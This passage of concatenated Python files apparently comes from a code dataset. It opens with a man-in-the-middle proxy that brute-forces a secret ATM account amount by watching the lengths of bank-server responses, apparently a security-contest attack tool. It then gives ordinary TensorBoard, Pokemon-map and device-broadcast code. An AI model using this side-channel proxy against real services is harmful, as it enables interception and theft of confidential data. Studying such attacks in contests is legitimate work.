    """Write a diagnostic message to stderr (stdout is the data channel)."""
    sys.stderr.write("%s\n" % (m,))
def send_command(shared):
    """Build the next JSON command for the current brute-force state and
    enqueue it on `shared` (consumed by send_input()).

    State machine (see the module-level comment on cur_state):
      0 -> create a fresh card file / account pair
      1 -> withdraw the digits recovered so far (or fall through to balance)
      2 -> request the balance (mitm() records the response length baseline)
      3 -> probe the next digit with a withdraw (deposit for the last digit)
      4 -> request the balance again so mitm() can compare lengths
      other -> emit a terminating "done" command
    """
    global cur_state
    global cur_length
    global amount_detected
    global cur_amount_len
    global next_digit
    global last_digit
    global cur_file
    global cur_file_name
    global cur_account
    global cur_account_name
    try:
        if cur_state == 0:
            # Fresh round: reset the baseline and digit counter, allocate the
            # next zero-padded card-file / account names.
            cur_length = float("inf")
            next_digit = 0
            cur_file += 1
            cur_file_name = str(cur_file).zfill(MAX_FILE_LENGTH)
            cur_account += 1
            cur_account_name = str(cur_account).zfill(MAX_ACCOUNT_LENGTH)
            json_command = NEW_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
                .replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', '%AMOUNT%')
            log("[MITM]: found so far: %s" % amount_detected)
            log("[MITM]: sending new: %s" % json_command)
        elif cur_state == 1 and cur_amount_len > 0:
            # Withdraw the recovered prefix, zero-padded to the full width.
            amount = amount_detected + str('').zfill(MAX_AMOUNT_LEN - cur_amount_len) + '.00'
            json_command = WITHDRAW_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
                .replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', amount)
            log("[MITM]: found so far: %s" % amount_detected)
            log("[MITM]: sending wit: %s" % json_command)
        elif cur_state == 2 or (cur_state == 1 and cur_amount_len == 0):
            # Balance query; -1 is logged while no baseline is recorded yet.
            cur_state = 2
            json_command = BALANCE_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
                .replace('%IM_ACCOUNT%', cur_account_name)
            log("[MITM]: found so far: %s -- current length: %d"
                % (amount_detected, cur_length if cur_length != float('inf') else -1))
            log("[MITM]: sending bal: %s" % json_command)
        elif cur_state == 3:
            if next_digit >= 10:
                # All ten candidates probed without a match: give up.
                cur_state = 6
                log("[MITM] failed to brute-force")
                json_command = '{"type": "done"}'
            else:
                # Probe amount: a single 1 in the current digit position.
                amount = '1' + str('').zfill(MAX_AMOUNT_LEN - cur_amount_len - 1) + '.00'
                if last_digit:
                    # The final digit is probed with deposits instead.
                    json_command = DEPOSIT_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
                        .replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', amount)
                    next_digit += 1
                    log("[MITM]: found so far: %s -- current length: %d -- current digit: %d"
                        % (amount_detected, cur_length if cur_length != float('inf') else -1, next_digit))
                    log("[MITM]: sending dep - step: %s" % json_command)
                else:
                    json_command = WITHDRAW_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
                        .replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', amount)
                    next_digit += 1
                    log("[MITM]: found so far: %s -- current length: %d -- current digit: %d"
                        % (amount_detected, cur_length if cur_length != float('inf') else -1, next_digit))
                    log("[MITM]: sending wit - step: %s" % json_command)
        elif cur_state == 4:
            json_command = BALANCE_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
                .replace('%IM_ACCOUNT%', cur_account_name)
            log("[MITM]: found so far: %s -- current length: %d -- current digit: %d"
                % (amount_detected, cur_length if cur_length != float('inf') else -1, next_digit))
            log("[MITM]: sending bal: %s" % json_command)
        else:
            json_command = '{"type": "done"}'
            log("[MITM]: invalid state")
        # send to command server
        command = json.loads(json_command)
        shared.put(command, block=True)
    except Exception:
        log(traceback.format_exc())
def mitm(buff, direction, shared):
    """Observe one proxied buffer and advance the brute-force state machine.

    Client->server traffic passes through untouched; server->client response
    *lengths* act as a side channel for whether the last probed operation
    succeeded.  Always returns `buff` unchanged -- the proxy never modifies
    the stream.
    """
    global cur_state
    global cur_length
    global amount_detected
    global cur_amount_len
    global next_digit
    global last_digit
    # hb = "".join("{:02x}".format(c) for c in buff)
    if direction == CLIENT2SERVER:
        # log("-> %d ->" % len(buff))
        pass
    elif direction == SERVER2CLIENT:
        try:
            log("<- [%d] last digit = %s <-" % (len(buff), str(last_digit)))
            if cur_state == 0 or cur_state == 1:
                # Account created / initial withdraw answered: advance.
                cur_state += 1
                send_command(shared)
            elif cur_state == 2:
                # Balance response: record its length as the baseline.
                cur_length = len(buff)
                cur_state = 3
                send_command(shared)
            elif cur_state == 3:
                if len(buff) == ERROR_MARK:
                    # Error-sized response: the probe failed, so the digit is 0.
                    digit_found = 0
                    log("[MITM] found next digit: %s" % str(digit_found))
                    amount_detected += str(digit_found)
                    cur_amount_len += 1
                    if cur_amount_len < MAX_AMOUNT_LEN:
                        # Start a fresh account for the next digit position.
                        next_digit = 0
                        cur_state = 0
                        if cur_amount_len == MAX_AMOUNT_LEN - 1:
                            last_digit = True
                        send_command(shared)
                    else:
                        # Every digit recovered: report the secret and finish.
                        log("[MITM] found amount: %s" % amount_detected)
                        cur_state = 4
                        finish = {"type": "learned", "variable": "amount", "secret": int(amount_detected)}
                        shared.put(finish, block=True)
                        time.sleep(1)
                        finish = {"type": "done"}
                        shared.put(finish, block=True)
                else:
                    # Probe accepted: check the balance to compare lengths.
                    cur_state += 1
                    send_command(shared)
            elif cur_state == 4:
                if ((len(buff) < cur_length and not last_digit)
                        or (len(buff) > cur_length and last_digit)):
                    # Balance length moved in the expected direction: the digit
                    # is determined by how many probes it took.
                    digit_found = (10 - next_digit) if last_digit else next_digit
                    log("[MITM] found next digit: %s" % str(digit_found))
                    amount_detected += str(digit_found)
                    cur_amount_len += 1
                    if cur_amount_len < MAX_AMOUNT_LEN:
                        next_digit = 0
                        cur_state = 0
                        if cur_amount_len == MAX_AMOUNT_LEN - 1:
                            last_digit = True
                        send_command(shared)
                    else:
                        log("[MITM] found amount: %s" % amount_detected)
                        cur_state = 4
                        finish = {"type": "learned", "variable": "amount", "secret": int(amount_detected)}
                        shared.put(finish, block=True)
                        time.sleep(1)
                        finish = {"type": "done"}
                        shared.put(finish, block=True)
                else:
                    # No change yet: probe the next candidate digit.
                    cur_state = 3
                    send_command(shared)
            # log("<- %d [%d] <-" % (len(buff), cur_message))
        except Exception:
            log(traceback.format_exc())
    return buff
@contextmanager
def ignored(*exceptions):
    """Context manager that silently swallows the given exception types.

    Any exception NOT listed still propagates to the caller.
    """
    try:
        yield
    except exceptions:
        # Deliberately discarded: callers opt in to best-effort semantics.
        return
def kill_p(a, b):
    """Best-effort teardown of a proxied socket pair.

    Shuts down and closes `a` and `b`, swallowing errors on each socket
    INDEPENDENTLY.  The original wrapped all four calls in one
    `ignored(Exception)` block, so any failure on `a` (e.g. it was already
    closed) skipped the shutdown/close of `b`, leaking its descriptor.
    """
    for sock in (a, b):
        try:
            sock.shutdown(socket.SHUT_RDWR)
        except Exception:
            pass  # already closed / never connected -- nothing to do
        try:
            sock.close()
        except Exception:
            pass
    return
def worker(client, server, n, shared):
    """Pump bytes from `client` to `server` until EOF, send failure, or the
    global run flag clears.

    `n` is the direction tag (CLIENT2SERVER / SERVER2CLIENT) handed to
    mitm(), which observes every buffer before it is forwarded.
    NOTE(review): indentation reconstructed from a flattened source; the
    stray `pass` before kill_p in the send-failure branch is preserved as-is.
    """
    while running:
        b = ""
        with ignored(Exception):
            b = client.recv(4096)
        if len(b) == 0:
            # EOF or recv error: tear down both ends of the pair.
            kill_p(client, server)
            return
        try:
            b = mitm(b, n, shared)
        except Exception:
            pass
        try:
            server.send(b)
        except Exception:
            # Forwarding failed: close both sockets and stop this direction.
            pass
            kill_p(client, server)
            return
    # Run flag cleared: close the pair before exiting.
    kill_p(client, server)
    return
def signal_handler(sn, sf):
    """SIGTERM handler: clear the global run flag so every loop winds down.

    Also called directly (with None args) by do_proxy_main on shutdown.
    """
    global running
    running = False
def do_proxy_main(port, remote_host, remote_port):
    """Accept client connections on `port` and proxy each to the remote
    server, spawning one worker thread per direction.

    Also starts the send_input() relay thread for queued commands.
    NOTE(review): reads the module-level `args` (argparse result) for the
    command server address, so this only works when the script runs as
    __main__ -- confirm before reusing as a library function.
    """
    signal.signal(signal.SIGTERM, signal_handler)
    workers = []
    p = None
    try:
        shared = Queue()
        # Command-relay thread; host/port come from the global CLI args.
        p = threading.Thread(target=send_input, args=(args.c, args.d, shared))
        p.start()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(("0.0.0.0", port))
        s.listen(1)
        # Kick off the brute-force by issuing the first command.
        send_command(shared)
        while running:
            k, a = s.accept()
            v = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            v.connect((remote_host, remote_port))
            # One worker per direction so both halves of the stream flow.
            t1 = threading.Thread(target=worker, args=(k, v, CLIENT2SERVER, shared))
            t2 = threading.Thread(target=worker, args=(v, k, SERVER2CLIENT, shared))
            t2.start()
            t1.start()
            workers.append((t1, t2, k, v))
    except Exception:
        pass
    # Shut down: flag first, then sockets, then join the threads.
    signal_handler(None, None)
    for t1, t2, k, v in workers:
        kill_p(k, v)
        t1.join()
        t2.join()
    # NOTE(review): p stays None if thread creation itself failed above, in
    # which case this join would raise AttributeError.
    p.join()
    return
def send_input(host, port, shared):
    """Drain command dicts from `shared` and POST each to the command server.

    Runs until the global run flag clears; queue timeouts and delivery
    failures are swallowed and the loop simply tries again (best-effort).
    """
    global running
    endpoint = "http://{0}:{1}".format(host, port)
    while running:
        try:
            item = shared.get(block=True, timeout=1)
            time.sleep(0.1)
            response = requests.post(endpoint, data={'REQUEST': json.dumps(item)})
            log(response.text)
        except Exception:
            pass
        time.sleep(0.25)
# CLI entry point: start the MITM proxy between the ATM client and the bank.
# NOTE: `args` is intentionally module-level -- do_proxy_main/send_input read
# the command-server address (-c/-d) from it.
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Proxy')
    parser.add_argument('-p', type=int, default=4000, help="listen port")
    parser.add_argument('-s', type=str, default="127.0.0.1", help="server ip address")
    parser.add_argument('-q', type=int, default=3000, help="server port")
    parser.add_argument('-c', type=str, default="127.0.0.1", help="command server")
    parser.add_argument('-d', type=int, default=5000, help="command port")
    args = parser.parse_args()
    print("started")
    sys.stdout.flush()
    do_proxy_main(args.p, args.s, args.q)
|
server.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module for building TensorBoard servers.
This is its own module so it can be used in both actual code and test code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import gcs
from tensorflow.tensorboard.backend import handler
# How many elements to store per tag, by tag type. These caps bound memory
# use when accumulating events for the TensorBoard frontend.
TENSORBOARD_SIZE_GUIDANCE = {
    event_accumulator.COMPRESSED_HISTOGRAMS: 500,
    event_accumulator.IMAGES: 4,
    event_accumulator.AUDIO: 4,
    event_accumulator.SCALARS: 1000,
    event_accumulator.HISTOGRAMS: 50,
}
def ParseEventFilesSpec(logdir):
  """Parses `logdir` into a map from paths to run group names.

  The events files flag format is a comma-separated list of path
  specifications. A path specification either looks like
  'group_name:/path/to/directory' or '/path/to/directory'; in the latter case
  the group is unnamed. Group names cannot start with a forward slash:
  /foo:bar/baz is interpreted as an unnamed spec with path '/foo:bar/baz'.
  Globs are not supported.

  Args:
    logdir: A comma-separated list of run specifications.

  Returns:
    A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
    Groups without an explicit name are named after their path. If logdir is
    None, returns an empty dict, which is helpful for testing things that
    don't require any valid runs.
  """
  files = {}
  if logdir is None:
    return files
  for specification in logdir.split(','):
    # Default: an unnamed group whose path is the whole specification.
    # GCS paths are never split on ':' (their scheme contains one).
    run_name = None
    path = specification
    if (not gcs.IsGCSPath(specification) and ':' in specification
        and specification[0] != '/'):
      # Split at most once so run_name:/path:with/a/colon still works.
      run_name, _, path = specification.partition(':')
    if not gcs.IsGCSPath(path):
      path = os.path.realpath(path)
    files[path] = run_name
  return files
def ReloadMultiplexer(multiplexer, path_to_run):
  """Loads all runs into the multiplexer.

  Args:
    multiplexer: The `EventMultiplexer` to add runs to and reload.
    path_to_run: A dict mapping from paths to run names, where `None` as the
      run name is interpreted as a run name equal to the path.
  """
  start = time.time()
  for path, name in six.iteritems(path_to_run):
    multiplexer.AddRunsFromDirectory(path, name)
  multiplexer.Reload()
  logging.info('Multiplexer done loading. Load took %0.1f secs',
               time.time() - start)
def StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval):
  """Starts a thread to automatically reload the given multiplexer.

  The thread will reload the multiplexer by calling `ReloadMultiplexer` every
  `load_interval` seconds, starting immediately.

  Args:
    multiplexer: The `EventMultiplexer` to add runs to and reload.
    path_to_run: A dict mapping from paths to run names, where `None` as the
      run name is interpreted as a run name equal to the path.
    load_interval: How many seconds to wait after one load before starting
      the next load.

  Returns:
    A started daemon `threading.Thread` that reloads the multiplexer.
  """
  # We don't call multiplexer.Reload() here because that would make
  # AddRunsFromDirectory block until the runs have all loaded.
  for path in path_to_run.keys():
    if gcs.IsGCSPath(path):
      # Fail fast if GCS support isn't available in this build.
      gcs.CheckIsSupported()
      logging.info(
          'Assuming %s is intended to be a Google Cloud Storage path because '
          'it starts with %s. If it isn\'t, prefix it with \'/.\' (i.e., use '
          '/.%s instead)', path, gcs.PATH_PREFIX, path)

  def _ReloadForever():
    # Daemon loop: reload, sleep load_interval seconds, repeat forever.
    while True:
      ReloadMultiplexer(multiplexer, path_to_run)
      time.sleep(load_interval)

  thread = threading.Thread(target=_ReloadForever)
  thread.daemon = True
  thread.start()
  return thread
class ThreadedHTTPServer(socketserver.ThreadingMixIn,
                         BaseHTTPServer.HTTPServer):
  """A threaded HTTP server.

  ThreadingMixIn handles each request on its own thread; daemon_threads
  ensures outstanding handler threads don't keep the process alive on exit.
  """
  daemon_threads = True
def BuildServer(multiplexer, host, port):
  """Sets up an HTTP server for running TensorBoard.

  Args:
    multiplexer: An `EventMultiplexer` that the server will query for
      information about events.
    host: The host name.
    port: The port number to bind to, or 0 to pick one automatically.

  Returns:
    A `BaseHTTPServer.HTTPServer`.
  """
  # Every request handler is constructed with the multiplexer pre-bound.
  return ThreadedHTTPServer(
      (host, port), functools.partial(handler.TensorboardHandler, multiplexer))
|
runserver.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import webbrowser
import os
import logging
import subprocess
from threading import Thread
from pogom import config
from pogom.app import Pogom
from pogom.utils import load_credentials
from pogom.search import search_loop
from pogom.models import create_tables, Pokemon, Pokestop, Gym
from pogom.pgoapi.utilities import get_pos_by_name
# Module-level logger for this launcher script.
log = logging.getLogger(__name__)
def start_locator_thread(auth,username,password,location,steps):
    """Spawn the map-scan loop on a named daemon thread.

    Daemonized so the scanner dies automatically with the main process.
    """
    worker = Thread(
        target=search_loop,
        args=(auth,username,password,location,steps,),
        name='search_thread',
    )
    worker.daemon = True
    worker.start()
def run(auth,username,password,location,steps):
    """Configure logging, start the scan thread, and serve the map web app.

    Blocks in app.run() until the process is stopped.
    """
    logging.basicConfig(level=logging.INFO, format='%(asctime)s [%(module)11s] [%(levelname)7s] %(message)s')
    # Quiet the chattier third-party loggers.
    logging.getLogger("peewee").setLevel(logging.INFO)
    logging.getLogger("requests").setLevel(logging.WARNING)
    logging.getLogger("pogom.pgoapi.pgoapi").setLevel(logging.WARNING)
    logging.getLogger("pogom.pgoapi.rpc_api").setLevel(logging.INFO)
    create_tables()
    # NOTE(review): the browser opens before app.run() below is actually
    # listening, so the first page load may need a refresh; the URL is also
    # hard-coded to match host/port set further down -- keep them in sync.
    url='http://localhost:5000'
    webbrowser.open_new(url)
    position = get_pos_by_name(location)
    log.info('Parsed location is: {:.4f}/{:.4f}/{:.4f} (lat/lng/alt)'.
             format(*position))
    config['ORIGINAL_LATITUDE'] = position[0]
    config['ORIGINAL_LONGITUDE'] = position[1]
    config['LOCALE'] = "en"
    start_locator_thread(auth,username,password,location,steps)
    app = Pogom(__name__)
    config['ROOT_PATH'] = app.root_path
    debug=False
    host='127.0.0.1'
    port=5000
    # Google Maps API key comes from the credentials file next to this script.
    config['GMAPS_KEY'] = load_credentials(os.path.dirname(os.path.realpath(__file__)))['gmaps_key']
    app.run(threaded=True, debug=debug, host=host, port=port)
|
devices.py |
"""
This module holds Devices related components.
A 'Device' is any computer running the clientapp or the serverapp
"""
import logging
from ConfigParser import SafeConfigParser
import config as config
import time
from player import LocalPlayer, RemotePlayer
from socket import *
import select
import os
import threading
class Capability:
    """Names of the capabilities a device can advertise in its broadcasts."""
    ProvideContent="ProvideContent"
    PlayMusic="PlayMusic"
    PlayVideo="PlayVideo"
    SyncToStream="SyncToStream"
class DeviceManager:
    """
    Keeps a registry of known devices.

    The registry is persisted to 'devices.ini' inside the configured
    workspace; an optional DeviceWatcher feeds UDP presence broadcasts into
    it via handleDeviceNotificationReceived().
    """
    def __init__(self, startWatcher = False, watcher = None):
        # ConfigParser instance backing the devices.ini registry.
        self.parser = SafeConfigParser()
        self.activeDevice = None
        self.bindEvents(startWatcher, watcher)
        #TODO : Load hostname and port from config
        # Start from a clean registry containing only the local device.
        self.deleteRegistry()
        self.registerLocalDevice()
    def registerLocalDevice(self):
        # The machine running this code is always registered as "local".
        self.registerDevice(Device("local","My player", "localhost"))
    def bindEvents(self, startWatcher, watcher = None):
        # Optionally start (or adopt) a DeviceWatcher whose payloads are
        # routed to handleDeviceNotificationReceived().
        self.deviceWatcher = None
        if startWatcher:
            if watcher:
                self.deviceWatcher = watcher
            else:
                self.deviceWatcher = DeviceWatcher(callback=self.handleDeviceNotificationReceived)
            self.deviceWatcher.start()
    def handleDeviceNotificationReceived(self, msg):
        """
        TODO : Move this.
        This method is triggered each time another device
        on the network broadcasted it's presence.
        If the device is already present in the devices registry,
        updates the device-last-seen field in the registry.
        If the device is not yet in the registry,
        add it and set device-last-seen to now.
        """
        device = Device.fromEncodedString(msg)
        self.registerDevice(device)
    def getDevices(self):
        """
        Read all configured devices from the registry.
        If the registry could not be read, return None
        If no devices were found in the registry, return an empty array
        otherwise return an array of Devices.
        """
        devices = []
        filesRead = self.parser.read(config.getFullFileName("devices.ini"))
        if len(filesRead) == 0:
            # Registry missing: try to create it; None signals failure.
            if not self.createRegistry():
                return
        for device in self.parser.sections():
            url = self.parser.get(device, 'url').encode("utf-8")
            lastSeen = self.parser.get(device, 'lastSeen')
            visibleName = self.parser.get(device, 'visibleName').encode("utf-8")
            type = self.parser.get(device, 'type').encode("utf-8")
            device = Device(type, visibleName, url, lastSeen)
            devices.append(device)
        return devices
    def getLikelyActiveDevices(self):
        # NOTE(review): no last-seen filtering is implemented yet -- this
        # currently returns every registered device.
        return self.getDevices()
    def registerDevice(self, device):
        """
        Register or update the specified device. Devices are stored into the file devices.ini
        from the config folder.
        """
        if not config.workspaceIsSet():
            print "Cannot register a device when the workspace is not set."
            return False
        if not isinstance(device, Device):
            error = "The specified device argument must inherit from the type devices.Device."
            logging.info(error)
            raise TypeError(error)
        filesRead = self.parser.read(config.getFullFileName("devices.ini"))
        if len(filesRead) == 0:
            print "The DeviceManager is creating the registry..."
            if not self.createRegistry():
                print "The DeviceManager could not create the registry."
                return False
        currentDevices = self.getDevices()
        # Known device (Device equality is by visibleName): refresh lastSeen.
        if not currentDevices == None and device in currentDevices:
            self.updateDeviceLastSeenTime(device)
            return True
        # New device: persist an ini section keyed by its visible name.
        sectionName = device.visibleName
        self.parser.add_section(sectionName)
        self.parser.set(sectionName, 'visibleName', device.visibleName)
        self.parser.set(sectionName, 'url', device.url)
        self.parser.set(sectionName, 'type', device.type)
        self.parser.set(sectionName, 'lastSeen', str(device.lastSeen))
        with open(config.getFullFileName("devices.ini"),'w') as f:
            self.parser.write(f)
        print "Added device to the registry: {0} {1}".format(device.visibleName, device.url)
        return True
    def printRegisteredDevices(self):
        for device in self.getDevices():
            print device.visibleName
    def getActivePlayer(self):
        # NOTE(review): looks unfinished -- never returns a player object.
        activeDevice = self.getActiveDevice()
        if activeDevice == None:
            print "There is no active player to select."
            return
    def getActiveDevice(self):
        # Lazily default the active device to the first "local" entry.
        if self.activeDevice == None:
            devices = self.getDevices()
            if not devices:
                return None
            for device in devices:
                if device.type == "local":
                    print "No device were selected. Using local device '{0}' as default.".format(device.visibleName)
                    self.activeDevice = device
                    break
        return self.activeDevice
    def getActiveDeviceType(self):
        activeDev = self.getActiveDevice()
        if activeDev:
            return activeDev.type
        else :
            return None
    def setActiveDevice(self, device):
        print "Set '{0}' as active device.".format(device.visibleName)
        self.activeDevice = device
    def setActiveDeviceCapabilities(self, capabilities = []):
        # NOTE(review): mutable default argument -- safe only while callers
        # never mutate the shared list.
        activeDevice = self.getActiveDevice()
        if activeDevice:
            return activeDevice.setCapabilities(capabilities)
        return False
    def updateDeviceLastSeenTime(self, device):
        # Rewrite only the lastSeen field of the device's ini section.
        filesRead = self.parser.read(config.getFullFileName("devices.ini"))
        if len(filesRead) == 0:
            error = "The DeviceManager could not load it's configuration file: {0}".format(config.getFullFileName("devices.ini"))
            logging.error(error)
            raise Exception(error)
        else:
            sectionName = device.visibleName
            lastSeen = device.lastSeen
            self.parser.set(sectionName, 'lastSeen', str(lastSeen))
            with open(config.getFullFileName("devices.ini"),'w') as f:
                self.parser.write(f)
            #print "Updated device lastSeen time: {0}".format(lastSeen)
    def createRegistry(self):
        # Create an empty devices.ini; returns True on success.
        try:
            print "Creating device registry: {0}".format(config.getFullFileName("devices.ini") or 'Undefined')
            with open(config.getFullFileName("devices.ini"), 'w+') as f:
                print f
            return True
        except Exception as e:
            print e
            return False
    def isWatching(self):
        if self.deviceWatcher:
            return self.deviceWatcher.isRunning()
        else:
            return False
    def deleteRegistry(self):
        # Truncate devices.ini by writing out a brand-new empty parser.
        try:
            self.parser = SafeConfigParser()
            with open(config.getFullFileName("devices.ini"),'w') as f:
                self.parser.write(f)
            return True
        except Exception as e:
            print e
            return False
    def dispose(self):
        print "Disposing DeviceManager..."
        if self.deviceWatcher:
            self.deviceWatcher.stop()
class DeviceWatcher():
    """
    Watch for other devices presence broadcasts.

    Listens for UDP datagrams on `portToWatch` from a background thread and
    hands each raw payload to `callback`.
    """
    def __init__(self, portToWatch = 5555, callback = None):
        self.portToWatch = portToWatch or config.getProperty("presence_watcher_watched_port")
        self.running = False
        self.bufferSize = 1024
        self.callback = callback
        # Reusable UDP socket bound to all interfaces on the watched port.
        self.sock = socket(AF_INET, SOCK_DGRAM)
        self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        self.sock.bind(('', self.portToWatch))
        self.thread = threading.Thread(target=self._run, name="watcher")
    def setCallbackFunc(self, callback):
        self.callback = callback
    def start(self):
        print "Starting to watch for devices UDP broadcasts on port: {0}...".format(self.portToWatch)
        self.running = True
        self.thread.start()
    def isRunning(self):
        return self.running
    def stop(self):
        # Closing the socket unblocks the recvfrom() in _run().
        print "Stopping DeviceWatcher..."
        self.running = False
        self.sock.close()
        print "Stopped DeviceWatcher."
    def _run(self):
        # Thread body: receive datagrams until stop() closes the socket.
        print "Started DeviceWatcher."
        try:
            while self.running:
                data, addr = self.sock.recvfrom(self.bufferSize)
                if self.callback:
                    self.callback(data)
        finally:
            self.sock.close()
    def getProcName(self):
        return self.thread.name
class DevicePresenceBroadcaster():
    """
    Notify other devices the presence of this device.

    Periodically UDP-broadcasts the encoded form of `thisDevice` from a
    background thread until stop() is called.
    """
    def __init__(self, thisDevice, portToTarget = 5555, delayBetweenBroadcastsInSec = 5):
        self.port = portToTarget or config.getProperty("presence_broadcaster_target_port")
        self.delay = delayBetweenBroadcastsInSec or config.getProperty("presence_broadcaster_call_delay_seconds")
        self.thisDevice = thisDevice
        self.running = False
        # Broadcast-capable UDP socket bound to an ephemeral local port.
        self.sock = socket(AF_INET, SOCK_DGRAM)
        self.sock.bind(('', 0))
        self.sock.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
        self.thread = threading.Thread(target=self._run, name="broadcaster")
    def start(self):
        print "Starting PresenceBroadcaster with delay =", self.delay, "seconds"
        self.running = True
        self.thread.start()
    def isRunning(self):
        return self.running
    def stop(self):
        print "Stopping DevicePresenceBroadcaster..."
        self.running = False
        self.sock.close()
        print "Stopped PresenceBroadcaster."
    def _run(self):
        # Thread body: broadcast, sleep, repeat until the run flag clears.
        print "Started PresenceBroadcaster."
        try:
            while self.running:
                try:
                    data = self.thisDevice.encodeForTransport()
                    self.sock.sendto(data, ('<broadcast>', int(self.port)))
                    print "Broadcasting {0} presence on UDP port: {1}".format(self.thisDevice.visibleName, self.port)
                except Exception as e:
                    print e
                #Wait if broadcaster is running
                if self.running:
                    time.sleep(self.delay)
        finally:
            self.stop()
    def getProcName(self):
        return self.thread.name
class Device:
    """
    A 'Device' is any computer running the clientapp or the serverapp.

    Devices are identified by `visibleName` (equality compares only that)
    and addressed by `url` ("host:port"). They serialize for UDP transport
    with encodeForTransport() and are rebuilt by fromEncodedString().
    """
    def __init__(self, type="local", visibleName = None, url = None, lastSeen = None, capabilities = None):
        self.visibleName = visibleName
        self.url = url or "0:0"
        self.lastSeen = lastSeen or time.localtime()
        self.type = type
        self.capabilities = capabilities or []
        # Split the normalized self.url, not the raw argument: the original
        # tested `':' in url`, which raised TypeError whenever url was None
        # (the default!).
        if ':' in self.url:
            self.host, self.port = self.url.split(':')
        else:
            self.host = self.url
    def isLikelyActive(self):
        # NOTE(review): the original called time.fromtimestamp() (which does
        # not exist in the time module) and subtracted struct_time values, so
        # it always raised. Until a real last-seen check is written, report
        # the conservative value the original intended to return.
        return False
    @staticmethod
    def fromEncodedString(encodedString):
        """
        Copy constructor for a Device encoded with encodeForTransport().
        """
        visibleName, url, capabilities = Device.decode(encodedString)
        return Device("remote", visibleName=visibleName, url=url, capabilities=capabilities)
    def __eq__(self, other):
        # Identity is the visible name only; url/type/lastSeen are ignored.
        return (isinstance(other, self.__class__)
                and self.visibleName == other.visibleName)
    def __ne__(self, other):
        return not self.__eq__(other)
    def __repr__(self):
        return self.visibleName + " [{0}]".format(self.type)
    def __str__(self):
        # The original returned a tuple, which made str(device) raise
        # TypeError; __str__ must return a string.
        return "{0} ({1})".format(self.visibleName, self.url)
    def encodeForTransport(self):
        """
        Encode this device to a string for transport via tcp
        @return 'deviceName;192.168.1.1:80;capability1|capability2|...'
        """
        capabilityString = ""
        for cap in self.capabilities:
            capabilityString = capabilityString + cap + "|"
        #Remove trailing '|'
        capabilityString = capabilityString[:-1]
        encodedDevice = "{0};{1};{2}".format(self.visibleName, self.url, capabilityString)
        print(encodedDevice)  # parenthesized: identical output on Python 2 and 3
        return encodedDevice
    @staticmethod
    def decode(encodedString):
        """Split an encoded device string into (name, url, capabilities)."""
        print(encodedString)  # parenthesized: identical output on Python 2 and 3
        args = encodedString.split(';')
        name = args[0]
        url = args[1]
        capabilities = args[2].split('|')
        return name, url, capabilities
    def setCapabilities(self, capabilities):
        self.capabilities = capabilities
def testPresenceBroadcaster():
    """Smoke test: broadcast this device's presence for a few seconds while a
    watcher listens on the same port, then shut both down."""
    device = Device(url="localhost:5000", visibleName="test-device")
    broadcaster = DevicePresenceBroadcaster(device, delayBetweenBroadcastsInSec=1)
    listener = DeviceWatcher()
    listener.start()
    broadcaster.start()
    time.sleep(5)
    broadcaster.stop()
    listener.stop()
# Manual test entry point: the config folder must be set before any
# registry / broadcast machinery is used.
if __name__ == '__main__':
    config.setConfigFolder('../config/')
    testPresenceBroadcaster()
    #man = DeviceManager()
    # man.handleDeviceNotificationReceived("rpi-yam","192.168.1.127:5005")
    #print man.printRegisteredDevices()
def startPresenceBroadcaster():
    """Create and start a presence broadcaster for this device.

    Stores the broadcaster in the module-level PRESENCE_BROADCASTER so that
    stopPresenceBroadcaster() can reach it later.
    """
    # The original assigned a plain local variable, so stopPresenceBroadcaster
    # always hit a NameError; declare the name global before assigning.
    global PRESENCE_BROADCASTER
    from devices import Device
    thisDevice = Device("rpi")
    PRESENCE_BROADCASTER = DevicePresenceBroadcaster(thisDevice)
    PRESENCE_BROADCASTER.start()
def stopPresenceBroadcaster():
    """Stop the broadcaster started by startPresenceBroadcaster(), if any.

    Safe to call even when no broadcaster was ever started -- the original
    raised NameError in that case because PRESENCE_BROADCASTER was undefined.
    """
    broadcaster = globals().get('PRESENCE_BROADCASTER')
    if broadcaster:
        broadcaster.stop()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.